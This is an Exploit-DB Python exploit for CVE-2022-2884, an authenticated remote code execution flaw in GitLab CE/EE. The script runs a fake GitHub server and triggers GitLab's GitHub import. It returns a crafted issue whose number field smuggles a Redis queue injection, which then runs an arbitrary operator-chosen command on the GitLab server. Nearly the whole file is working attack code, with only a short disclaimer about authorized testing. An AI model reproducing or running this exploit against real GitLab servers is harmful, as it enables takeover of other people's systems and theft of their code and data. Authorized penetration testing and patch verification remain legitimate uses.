# GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)
#
# EDB-ID: 51181
# Platform: Ruby
# Date: 2023-04-01


# Exploit Title: GitLab v15.3 - Remote Code Execution (RCE) (Authenticated) 
# Date: 2022-12-25
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install/
# Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3.1
# Tested on: 'gitlab/gitlab-ce:15.3.0-ce.0' Docker container (vulnerable application), 'Ubuntu 20.04.5 LTS' with 'Python 3.8.10' (script execution)
# CVE: CVE-2022-2884
# Category: WebApps
# Repository: https://github.com/m3ssap0/gitlab_rce_cve-2022-2884
# Credits: yvvdwf (https://hackerone.com/reports/1672388)

# This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884.

# A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 
# 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution 
# via the Import from GitHub API endpoint.

# https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/

# DISCLAIMER: This tool is intended for security engineers and appsec people performing authorized security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which anyone uses
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.

import argparse
import logging
import validators
import random
import string
import requests
import time
import base64
import sys

from flask import Flask, current_app, request
from multiprocessing import Process

# Version tag interpolated into the CLI description and the startup log line.
VERSION = "v1.0 (2022-12-25)"
# Log level used unless the verbose flag is given on the command line.
DEFAULT_LOGGING_LEVEL = logging.INFO
# Flask application object on which all routes in this file are registered.
app = Flask(__name__)

def parse_arguments():
    """Define the command-line interface and parse ``sys.argv``.

    Required options: ``--url``, ``--private-token``, ``--address`` and
    ``--command``. Optional ones: ``--target-namespace`` (default ``root``),
    ``--port`` (default 1337), ``--https``, ``--delay`` and ``--verbose``.

    Returns:
        The ``argparse.Namespace`` produced by ``parse_args()``.
    """
    cli = argparse.ArgumentParser(
        description=f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}"
    )

    # Options describing the GitLab instance.
    cli.add_argument("-u", "--url", required=True, help="URL of the victim GitLab")
    cli.add_argument("-pt", "--private-token", required=True, help="private token of GitLab")
    cli.add_argument(
        "-tn", "--target-namespace",
        default="root",
        help="target namespace of GitLab (default is 'root')",
    )

    # Options describing where the local fake server is reachable.
    cli.add_argument("-a", "--address", required=True, help="IP address of the attacker machine")
    cli.add_argument(
        "-p", "--port",
        type=int,
        default=1337,
        help="TCP port of the attacker machine (default is 1337)",
    )
    cli.add_argument(
        "-s", "--https",
        action="store_true",
        help="set if the attacker machine is exposed via HTTPS",
    )

    # Run-time behaviour.
    cli.add_argument("-c", "--command", required=True, help="the command to execute")
    cli.add_argument(
        "-d", "--delay",
        type=float,
        help="seconds of delay to wait for the exploit to complete",
    )
    cli.add_argument("-v", "--verbose", action="store_true", help="verbose mode")

    return cli.parse_args()

def validate_input(args):
    """Validate the parsed command-line arguments.

    Args:
        args: Namespace returned by ``parse_arguments()``.

    Raises:
        ValueError: On the first argument that fails its check (URL, private
            token, target namespace, IPv4 address, port, command, delay).
    """
    # The validators functions do not raise on bad input: they return a falsy
    # failure object. The result therefore has to be tested for truthiness;
    # wrapping the call in try/except never triggers.
    if not validators.url(args.url.strip()):
        raise ValueError("Invalid target URL!")

    # Only emptiness is rejected. The "glpat-" prefix is deliberately not
    # enforced (the original condition never enforced it either), so tokens
    # without that prefix keep working.
    if not args.private_token.strip():
        raise ValueError("Invalid GitLab private token!")

    if not args.target_namespace.strip():
        raise ValueError("Invalid GitLab target namespace!")

    if not validators.ipv4(args.address.strip()):
        raise ValueError("Invalid attacker IP address!")

    if not 1 <= args.port <= 65535:
        raise ValueError("Invalid attacker TCP port!")

    if not args.command.strip():
        raise ValueError("Invalid command!")

    # The delay is optional; when given it must be strictly positive.
    if args.delay is not None and args.delay <= 0.0:
        raise ValueError("Invalid delay!")

def generate_random_string(length):
    """Return ``length`` random characters drawn from ASCII letters and digits."""
    alphabet = string.ascii_letters + string.digits
    picked = []
    for _ in range(length):
        picked.append(random.choice(alphabet))
    return "".join(picked)

def generate_random_lowercase_string(length):
    """Return ``length`` random characters drawn from ``a``-``z``."""
    picked = []
    for _ in range(length):
        picked.append(random.choice(string.ascii_lowercase))
    return "".join(picked)

def generate_random_number(length):
    """Return a string of ``length`` random decimal digits with no leading zero.

    Candidates are drawn repeatedly until one does not start with ``"0"``.
    """
    while True:
        candidate = "".join(random.choice(string.digits) for _ in range(length))
        if not candidate.startswith("0"):
            return candidate

def base64encode(to_encode):
    """Return the Base64 text form of an ASCII string.

    Raises:
        UnicodeEncodeError: If ``to_encode`` contains non-ASCII characters.
    """
    raw = to_encode.encode("ascii")
    encoded = base64.b64encode(raw)
    return str(encoded, "ascii")

def send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id):
    """POST the import request to the target's ``api/v4/import/github`` endpoint.

    Args:
        url: Base URL of the target GitLab instance.
        private_token: Value sent in the ``PRIVATE-TOKEN`` header.
        target_namespace: Namespace placed in the request body.
        address: Host part of the ``github_hostname`` sent in the body.
        port: Port part of the ``github_hostname`` sent in the body.
        is_https: Whether ``github_hostname`` uses ``https`` instead of ``http``.
        fake_repo_id: Repository id placed in the request body.

    Raises:
        Exception: If the HTTP request fails, or if the response status is
            not 201. The two cases carry different messages.
    """
    logging.info("Sending request to target GitLab.")
    protocol = "https" if is_https else "http"
    # Upper bound in seconds, so a stalled connection cannot block forever.
    timeout_seconds = 60
    headers = {
        "Content-Type": "application/json",
        "PRIVATE-TOKEN": private_token,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
    }
    fake_personal_access_token = "ghp_" + generate_random_string(36)
    new_name = generate_random_lowercase_string(8)
    logging.debug("Random generated parameters of the request:")
    logging.debug(f"              fake_repo_id = {fake_repo_id}")
    logging.debug(f"fake_personal_access_token = {fake_personal_access_token}")
    logging.debug(f"                  new_name = {new_name}")
    payload = {
        "personal_access_token": fake_personal_access_token,
        "repo_id": fake_repo_id,
        "target_namespace": target_namespace,
        "new_name": new_name,
        "github_hostname": f"{protocol}://{address}:{port}"
    }
    target_endpoint = f"{url}"
    if not target_endpoint.endswith("/"):
        target_endpoint = f"{target_endpoint}/"
    target_endpoint = f"{target_endpoint}api/v4/import/github"

    # Only transport-level failures are reported as a contact error. The
    # status check lives outside this try block so that its own exception is
    # not re-labelled as a connection problem.
    try:
        r = requests.post(target_endpoint, headers=headers, json=payload, timeout=timeout_seconds)
    except requests.RequestException as err:
        logging.fatal("Error in contacting the target GitLab.")
        raise Exception("Error in contacting the target GitLab.") from err

    logging.debug("Response:")
    logging.debug(f"status_code = {r.status_code}")
    logging.debug(f"       text = {r.text}")
    logging.info(f"Request sent to target GitLab (HTTP {r.status_code}).")
    if r.status_code != 201:
        logging.fatal("Wrong response received from the target GitLab.")
        raise Exception("Wrong response received from the target GitLab.")

def is_server_alive(address, port, is_https):
    """Report whether the local fake server answers on its index route.

    Args:
        address: Host to probe.
        port: TCP port to probe.
        is_https: Probe over ``https`` instead of ``http``.

    Returns:
        True when ``GET /`` returns HTTP 200 and the body contains
        ``"The server is running."``; False otherwise, including on any
        request error or timeout.
    """
    protocol = "https" if is_https else "http"
    try:
        # A short timeout keeps the caller's polling loop responsive.
        r = requests.get(f"{protocol}://{address}:{port}/", timeout=5)
    except requests.RequestException:
        return False
    return r.status_code == 200 and "The server is running." in r.text

def start_fake_github_server(address, port, is_https, command, fake_repo_id):
    """Populate ``app.config`` and run the Flask app on ``0.0.0.0:port``.

    The random user, user id, repository name and issue id are generated here,
    once, and stored in ``app.config`` for the route handlers to read.
    ``app.run`` blocks until the server stops.
    """
    scheme = "https" if is_https else "http"
    settings = {
        "address": address,
        "port": port,
        "attacker_server": f"{scheme}://{address}:{port}",
        "command": command,
        "fake_user": generate_random_lowercase_string(8),
        "fake_user_id": generate_random_number(8),
        "fake_repo": generate_random_lowercase_string(8),
        "fake_repo_id": fake_repo_id,
        "fake_issue_id": generate_random_number(9),
    }
    app.config.update(settings)
    app.run("0.0.0.0", port)

def encode_command(command):
    """Rewrite ``command`` as a sequence of ``<< <codepoint>.chr`` tokens.

    Each character becomes ``"<< N.chr "`` where ``N`` is ``ord(char)``; a
    final ``"<<"`` is appended. The result is logged at debug level.
    """
    tokens = [f"<< {ord(ch)}.chr " for ch in command]
    tokens.append("<<")
    encoded_command = "".join(tokens)
    logging.debug(f"encoded_command = {encoded_command}")
    return encoded_command

def generate_rce_payload(command):
    """Return the payload string that wraps ``command``.

    The command is first passed through ``encode_command`` and then
    interpolated into a fixed template. Both the raw command and the final
    payload are logged at debug level.
    """
    logging.debug("Crafting RCE payload:")
    logging.debug(f"        command = {command}")
    encoded_command = encode_command(command) # Useful in order to prevent escaping hell...
    # The template is a single f-string; doubled braces are literal braces and
    # the backslash sequences produce escaped quotes in the resulting text.
    rce_payload = f"lpush resque:gitlab:queue:system_hook_push \"{{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('| ' {encoded_command} ' ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}}\""
    logging.debug(f"    rce_payload = {rce_payload}")
    return rce_payload

def generate_user_response(attacker_server, fake_user, fake_user_id):
    """Build the short user object used in the fake API responses.

    Args:
        attacker_server: Base URL prefixed to every generated link.
        fake_user: Login name used in the links and the ``login`` field.
        fake_user_id: Numeric id (as a string or int) for ``id`` and ``node_id``.

    Returns:
        A dict of user fields.
    """
    # Every per-user API link shares this prefix.
    user_api = f"{attacker_server}/users/{fake_user}"
    return {
        "avatar_url": f"{attacker_server}/avatars/{fake_user_id}",
        "events_url": f"{user_api}/events{{/privacy}}",
        "followers_url": f"{user_api}/followers",
        "following_url": f"{user_api}/following{{/other_user}}",
        "gists_url": f"{user_api}/gists{{/gist_id}}",
        "gravatar_id": "",
        "html_url": f"{attacker_server}/{fake_user}",
        "id": int(fake_user_id),
        "login": f"{fake_user}",
        "node_id": base64encode(f"04:User{fake_user_id}"),
        "organizations_url": f"{user_api}/orgs",
        "received_events_url": f"{user_api}/received_events",
        "repos_url": f"{user_api}/repos",
        "site_admin": False,
        "starred_url": f"{user_api}/starred{{/owner}}{{/repo}}",
        "subscriptions_url": f"{user_api}/subscriptions",
        "type": "User",
        "url": user_api,
    }

def generate_user_full_response(attacker_server, fake_user, fake_user_id):
    """Build the full user object: the short user fields plus profile fields.

    Starts from ``generate_user_response`` and adds fixed profile values
    (bio, company, timestamps, counters and so on).
    """
    profile = generate_user_response(attacker_server, fake_user, fake_user_id)
    profile.update({
        "bio": None,
        "blog": "",
        "company": None,
        "created_at": "2020-08-21T14:35:46Z",
        "email": None,
        "followers": 2,
        "following": 0,
        "hireable": None,
        "location": None,
        "name": None,
        "public_gists": 0,
        "public_repos": 0,
        "twitter_username": None,
        "updated_at": "2022-08-08T12:11:40Z",
    })
    return profile

def generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id):
    """Build the repository object returned by the fake repository routes.

    Args:
        address: Host used in ``git_url`` and ``ssh_url``.
        port: Port used in ``git_url``.
        attacker_server: Base URL prefixed to every HTTP link.
        fake_user: Owner login used in the links and in ``full_name``.
        fake_user_id: Owner id passed to ``generate_user_response``.
        fake_repo: Repository name.
        repo_id: Repository id; converted with ``int()`` for the ``id`` field.

    Returns:
        A dict of repository fields.
    """
    # Two prefixes cover almost every link: the API-style path and the
    # web-style path of the repository.
    repo_api = f"{attacker_server}/repos/{fake_user}/{fake_repo}"
    repo_web = f"{attacker_server}/{fake_user}/{fake_repo}"
    return {
        "allow_auto_merge": False,
        "allow_forking": True,
        "allow_merge_commit": True,
        "allow_rebase_merge": True,
        "allow_squash_merge": True,
        "allow_update_branch": False,
        "archive_url": f"{repo_api}/{{archive_format}}{{/ref}}",
        "archived": False,
        "assignees_url": f"{repo_api}/assignees{{/user}}",
        "blobs_url": f"{repo_api}/git/blobs{{/sha}}",
        "branches_url": f"{repo_api}/branches{{/branch}}",
        "clone_url": f"{repo_web}.git",
        "collaborators_url": f"{repo_api}/collaborators{{/collaborator}}",
        "comments_url": f"{repo_api}/comments{{/number}}",
        "commits_url": f"{repo_api}/commits{{/sha}}",
        "compare_url": f"{repo_api}/compare/{{base}}...{{head}}",
        "contents_url": f"{repo_api}/contents/{{+path}}",
        "contributors_url": f"{repo_api}/contributors",
        "created_at": "2021-04-09T13:55:55Z",
        "default_branch": "main",
        "delete_branch_on_merge": False,
        "deployments_url": f"{repo_api}/deployments",
        "description": None,
        "disabled": False,
        "downloads_url": f"{repo_api}/downloads",
        "events_url": f"{repo_api}/events",
        "fork": False,
        "forks": 1,
        "forks_count": 1,
        "forks_url": f"{repo_api}/forks",
        "full_name": f"{fake_user}/{fake_repo}",
        "git_commits_url": f"{repo_api}/git/commits{{/sha}}",
        "git_refs_url": f"{repo_api}/git/refs{{/sha}}",
        "git_tags_url": f"{repo_api}/git/tags{{/sha}}",
        "git_url": f"git://{address}:{port}/{fake_user}/{fake_repo}.git",
        "has_downloads": True,
        "has_issues": True,
        "has_pages": False,
        "has_projects": True,
        "has_wiki": True,
        "homepage": None,
        "hooks_url": f"{repo_api}/hooks",
        "html_url": repo_web,
        "id": int(repo_id),
        "is_template": False,
        "issue_comment_url": f"{repo_api}/issues/comments{{/number}}",
        "issue_events_url": f"{repo_api}/issues/events{{/number}}",
        "issues_url": f"{repo_api}/issues{{/number}}",
        "keys_url": f"{repo_api}/keys{{/key_id}}",
        "labels_url": f"{repo_api}/labels{{/name}}",
        "language": "Python",
        "languages_url": f"{repo_api}/languages",
        "license": None,
        "merge_commit_message": "Message",
        "merge_commit_title": "Title",
        "merges_url": f"{repo_api}/merges",
        "milestones_url": f"{repo_api}/milestones{{/number}}",
        "mirror_url": None,
        "name": f"{fake_repo}",
        "network_count": 1,
        "node_id": base64encode(f"010:Repository{repo_id}"),
        "notifications_url": f"{repo_api}/notifications{{?since,all,participating}}",
        "open_issues": 4,
        "open_issues_count": 4,
        "owner": generate_user_response(attacker_server, fake_user, fake_user_id),
        "permissions": {
            "admin": True,
            "maintain": True,
            "pull": True,
            "push": True,
            "triage": True,
        },
        "private": True,
        "pulls_url": f"{repo_api}/pulls{{/number}}",
        "pushed_at": "2022-08-14T15:36:21Z",
        "releases_url": f"{repo_api}/releases{{/id}}",
        "size": 3802,
        "squash_merge_commit_message": "Message",
        "squash_merge_commit_title": "Title",
        "ssh_url": f"git@{address}:{fake_user}/{fake_repo}.git",
        "stargazers_count": 0,
        "stargazers_url": f"{repo_api}/stargazers",
        "statuses_url": f"{repo_api}/statuses/{{sha}}",
        "subscribers_count": 1,
        "subscribers_url": f"{repo_api}/subscribers",
        "subscription_url": f"{repo_api}/subscription",
        "svn_url": repo_web,
        "tags_url": f"{repo_api}/tags",
        "teams_url": f"{repo_api}/teams",
        "temp_clone_token": generate_random_string(32),
        "topics": [],
        "trees_url": f"{repo_api}/git/trees{{/sha}}",
        "updated_at": "2022-06-10T15:12:53Z",
        "url": repo_api,
        "use_squash_pr_title_as_default": False,
        "visibility": "private",
        "watchers": 0,
        "watchers_count": 0,
        "web_commit_signoff_required": False,
    }

def generate_issue_response(attacker_server, fake_user, fake_user_id, fake_repo, fake_issue_id, command):
    """Build the one-element issue list returned by the fake issues route.

    The ``number`` field is a nested object rather than an integer; its inner
    ``to_s`` value carries the string produced by ``generate_rce_payload``.

    Returns:
        A list containing a single issue dict.
    """
    rce_payload = generate_rce_payload(command)
    # Shared prefixes for the repository and for the hard-coded issue "3".
    repo_api = f"{attacker_server}/repos/{fake_user}/{fake_repo}"
    issue_api = f"{repo_api}/issues/3"
    issue = {
        "active_lock_reason": None,
        "assignee": None,
        "assignees": [],
        "author_association": "OWNER",
        "body": "hn-issue description",
        "closed_at": None,
        "comments": 1,
        "comments_url": f"{issue_api}/comments",
        "created_at": "2021-07-23T13:16:55Z",
        "events_url": f"{issue_api}/events",
        "html_url": f"{attacker_server}/{fake_user}/{fake_repo}/issues/3",
        "id": int(fake_issue_id),
        "labels": [],
        "labels_url": f"{issue_api}/labels{{/name}}",
        "locked": False,
        "milestone": None,
        "node_id": base64encode(f"05:Issue{fake_issue_id}"),
        "_number": 1,
        "number": {"to_s": {"bytesize": 2, "to_s": f"1234{rce_payload}" }},
        "performed_via_github_app": None,
        "reactions": {
            "+1": 0,
            "-1": 0,
            "confused": 0,
            "eyes": 0,
            "heart": 0,
            "hooray": 0,
            "laugh": 0,
            "rocket": 0,
            "total_count": 0,
            "url": f"{issue_api}/reactions",
        },
        "repository_url": f"{repo_api}/test",
        "state": "open",
        "state_reason": None,
        "timeline_url": f"{issue_api}/timeline",
        "title": f"{fake_repo}",
        "updated_at": "2022-08-14T15:37:08Z",
        "url": issue_api,
        "user": generate_user_response(attacker_server, fake_user, fake_user_id),
    }
    return [issue]

@app.before_request
def received_request():
    """Log the URL and headers of every incoming request at debug level."""
    logging.debug("Received request:")
    for label, value in (("    url", request.url), ("headers", request.headers)):
        logging.debug(f"{label} = {value}")

@app.after_request
def add_headers(response):
    """Set the JSON content type and fixed rate-limit headers on every response."""
    fixed_headers = (
        ("content-type", "application/json; charset=utf-8"),
        ("x-ratelimit-limit", "5000"),
        ("x-ratelimit-remaining", "4991"),
        ("x-ratelimit-reset", "1660136749"),
        ("x-ratelimit-used", "9"),
        ("x-ratelimit-resource", "core"),
    )
    for header_name, header_value in fixed_headers:
        response.headers[header_name] = header_value
    return response

@app.route("/")
def index():
    """Return the fixed banner that ``is_server_alive`` looks for."""
    banner = "The server is running."
    return banner

@app.route("/api/v3/rate_limit")
def api_rate_limit():
    """Return a fixed rate-limit document with per-resource quotas."""

    def quota(limit, reset, used=0):
        # "remaining" is always limit minus used in the fixed values served here.
        return {
            "limit": limit,
            "used": used,
            "remaining": limit - used,
            "reset": reset,
        }

    # The three distinct reset timestamps that appear in the document.
    core_reset = 1660136749
    early_reset = 1660133589
    late_reset = 1660137129

    return {
        "resources": {
            "core": quota(5000, core_reset, used=9),
            "search": quota(30, early_reset),
            "graphql": quota(5000, late_reset),
            "integration_manifest": quota(5000, late_reset),
            "source_import": quota(100, early_reset),
            "code_scanning_upload": quota(1000, late_reset),
            "actions_runner_registration": quota(10000, late_reset),
            "scim": quota(15000, late_reset),
            "dependency_snapshots": quota(100, early_reset),
        },
        "rate": quota(5000, core_reset, used=9),
    }

@app.route("/api/v3/repositories/<repo_id>")
@app.route("/repositories/<repo_id>")
def api_repositories_repo_id(repo_id: str):
    """Serve the fake repository object for a lookup by repository id.

    The route uses no converter, so ``repo_id`` arrives as a string;
    ``generate_repo_response`` converts it with ``int()``.
    """
    cfg = current_app.config
    return generate_repo_response(
        cfg["address"],
        cfg["port"],
        cfg["attacker_server"],
        cfg["fake_user"],
        cfg["fake_user_id"],
        cfg["fake_repo"],
        repo_id,
    )

@app.route("/api/v3/repos/<user>/<repo>")
def api_repositories_repo_user_repo(user: str, repo: str):
    """Serve the fake repository object for a lookup by ``<user>/<repo>``.

    The user and repository names come from the request path; the ids come
    from ``app.config``.
    """
    cfg = current_app.config
    return generate_repo_response(
        cfg["address"],
        cfg["port"],
        cfg["attacker_server"],
        user,
        cfg["fake_user_id"],
        repo,
        cfg["fake_repo_id"],
    )

@app.route("/api/v3/repos/<user>/<repo>/issues")
def api_repositories_repo_user_repo_issues(user: str, repo: str):
    """Serve the fake issue list for ``<user>/<repo>``."""
    # Imported locally so this block does not depend on the file-level imports.
    from flask import jsonify

    cfg = current_app.config
    issues = generate_issue_response(
        cfg["attacker_server"],
        user,
        cfg["fake_user_id"],
        repo,
        cfg["fake_issue_id"],
        cfg["command"],
    )
    # Returning a bare list from a view is only accepted by Flask >= 2.2;
    # jsonify produces the same JSON body on older versions as well.
    return jsonify(issues)

@app.route("/api/v3/users/<user>")
def api_users_user(user: str):
    """Serve the full fake user object for the login taken from the path."""
    cfg = current_app.config
    return generate_user_full_response(cfg["attacker_server"], user, cfg["fake_user_id"])

@app.route("/<user>/<repo>.git/HEAD")
@app.route("/<user>/<repo>.git/info/refs")
@app.route("/<user>/<repo>.wiki.git/HEAD")
@app.route("/<user>/<repo>.wiki.git/info/refs")
def empty_response(user: str, repo: str):
    """Answer the git ``HEAD`` / ``info/refs`` paths with an empty body.

    ``user`` and ``repo`` are captured from the path but not used.
    """
    logging.debug("Empty string response.")
    return ""

# All the others/non-existing routes.
@app.route('/<path:path>')
def catch_all(path):
    """Answer any otherwise unmatched path with an empty JSON array."""
    # Imported locally so this block does not depend on the file-level imports.
    from flask import jsonify

    logging.debug("Empty JSON array response.")
    # Returning a bare list from a view is only accepted by Flask >= 2.2;
    # jsonify produces the same "[]" body on older versions as well.
    return jsonify([])

def main():
    """Script entry point.

    Parses and validates the arguments, starts the fake server in a child
    process, waits until it answers, sends the import request, then waits
    either for ``--delay`` seconds or for the user to press Enter. The child
    process is always stopped before returning or exiting.

    Exits with status 1 on invalid input, if the fake server process dies
    while starting, or if the import request fails.
    """
    args = parse_arguments()
    logging_level = logging.DEBUG if args.verbose else DEFAULT_LOGGING_LEVEL
    logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s")

    # Report bad input as a single log line instead of a traceback.
    try:
        validate_input(args)
    except ValueError as err:
        logging.critical(f"{err}")
        sys.exit(1)

    url = args.url.strip()
    private_token = args.private_token.strip()
    target_namespace = args.target_namespace.strip()
    address = args.address.strip()
    port = args.port
    is_https = args.https
    command = args.command.strip()
    delay = args.delay
    logging.info(f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}")
    logging.debug("Parameters:")
    logging.debug(f"             url = {url}")
    logging.debug(f"   private_token = {private_token}")
    logging.debug(f"target_namespace = {target_namespace}")
    logging.debug(f"         address = {address}")
    logging.debug(f"            port = {port}")
    logging.debug(f"        is_https = {is_https}")
    logging.debug(f"         command = {command}")
    logging.debug(f"           delay = {delay}")

    fake_repo_id = generate_random_number(9)

    fake_github_server = Process(target=start_fake_github_server, args=(address, port, is_https, command, fake_repo_id))
    fake_github_server.start()

    # Everything after start() runs under try/finally so the child process is
    # stopped on every exit path, including sys.exit() and Ctrl-C.
    try:
        logging.info("Waiting for the fake GitHub server to start.")
        while not is_server_alive(address, port, is_https):
            # If the child has already exited (for example because the port
            # is in use) it will never become reachable; stop polling.
            if not fake_github_server.is_alive():
                logging.critical("The fake GitHub server stopped unexpectedly.")
                logging.critical("Aborting the script.")
                sys.exit(1)
            time.sleep(1)
            logging.debug("Waiting for the fake GitHub server to start.")
        logging.info("Fake GitHub server is running.")

        try:
            send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id)
        except Exception:
            logging.critical("Aborting the script.")
            sys.exit(1)

        if delay is not None:
            logging.info(f"Waiting for {delay} seconds to let attack finish.")
            time.sleep(delay)
        else:
            logging.info("Press Enter when the attack is finished.")
            input()
    finally:
        logging.debug("Stopping the fake GitHub server.")
        fake_github_server.kill()
        # Reap the child so it does not linger as a zombie process.
        fake_github_server.join()

    logging.info("Closing the script.")

# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()